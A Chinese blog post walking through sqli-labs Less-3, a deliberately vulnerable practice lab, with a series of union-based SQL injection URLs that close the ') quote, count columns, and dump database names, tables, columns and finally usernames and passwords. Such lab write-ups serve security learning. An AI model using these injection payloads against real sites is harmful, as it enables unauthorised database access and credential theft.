sql-libs——less3

最新推荐文章于 2023-05-01 20:50:35 发布

midsummer_woo

最新推荐文章于 2023-05-01 20:50:35 发布

阅读量145

点赞数

分类专栏： sql-libs 文章标签： sql 数据库 mysql

本文链接：https://blog.csdn.net/lushuaibao/article/details/120705964

版权

sql-libs 专栏收录该内容

8 篇文章 0 订阅

订阅专栏

首先看题目，提示请输入ID作为带数值的参数
在这里插入图片描述将ID带数值进行访问
加'判断有无注入，发现报错存在注入。

查看报错结果发现ID参数是通过'）来闭合的，使用其进行闭合。

猜测列数

http://192.168.0.5:9002/Less-3/?id=5%27) order by 3 --+

在这里插入图片描述

http://192.168.0.5:9002/Less-3/?id=-5%27) union select 1,2,3 --+

在这里插入图片描述爆数据库名

http://192.168.0.5:9002/Less-3/?id=-5%27) union select 1,version(),database() --+

在这里插入图片描述爆表名
http://192.168.0.5:9002/Less-3/?id=-5%27) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆字段名
http://192.168.31.164:9002/Less-3/?id=-5%27) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=%27users%27--+
在这里插入图片描述
爆内容，获得用户名密码

http://192.168.31.164:9002/Less-3/?id=-5%27) union select 1,group_concat(username),group_concat(password) from security.users--+

在这里插入图片描述

midsummer_woo

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
sql-libs——less3

http://192.168.0.5:9002/Less-3/?id=5%27)%20order%20by%203%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,2,3%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,version(),database()%20–+http://192.168.0.5:9002/Less-
复制链接

扫一扫